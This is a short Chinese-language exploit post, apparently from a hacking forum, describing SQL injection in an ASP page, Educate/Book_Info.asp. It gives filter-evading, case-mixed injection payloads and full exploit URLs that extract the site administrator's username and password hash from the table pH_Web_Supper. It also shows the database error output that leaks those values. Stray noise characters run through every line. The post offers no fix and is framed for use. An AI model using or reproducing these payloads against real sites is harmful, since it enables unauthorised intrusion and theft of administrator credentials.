漏洞出现在Educate/Book_Info.asp
: C d! S X3 F# W1 w9 N
; r$ _$ X# x: f6 {3 z: S此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出5 N. k. m# Z9 w" X& o
: T0 t1 X' ?' f$ L9 ]exp:如下% k+ F" S/ B( T' f L: i
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ E; |% L: M2 `查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# ]) Q( W- A+ S
( q+ ^. c C4 D& n- Q: _# [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 z! V( ~2 s/ [ c0 ~ 3 Y, e: T% |1 A1 A3 m" C* K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# U) D8 ~6 `' X, w# X: V3 m; a Z" ^, T( L+ f2 Z$ n j
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
* l, S% }0 {% @$ D7 k/ s& u ( P0 Y8 T6 D# b5 d
/Educate/Book_Info.asp,行 8
; f1 p; A/ s! P, b6 U5 ?3 C8 y
: i% b: U) d; ?4 j6 F# ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)8 K' |1 x! r" S7 G
4 U: c5 M0 M! g; k, ^Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
0 y) h% \ M2 r
% f7 I8 l4 x1 L U; m将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
0 j* o; B8 Y( Y. o6 q0 Y& j0 a. Z ' {, l+ O( M, A- {3 h" x m
/Educate/Book_Info.asp,行 8
. v% O$ w V5 o9 n0 D |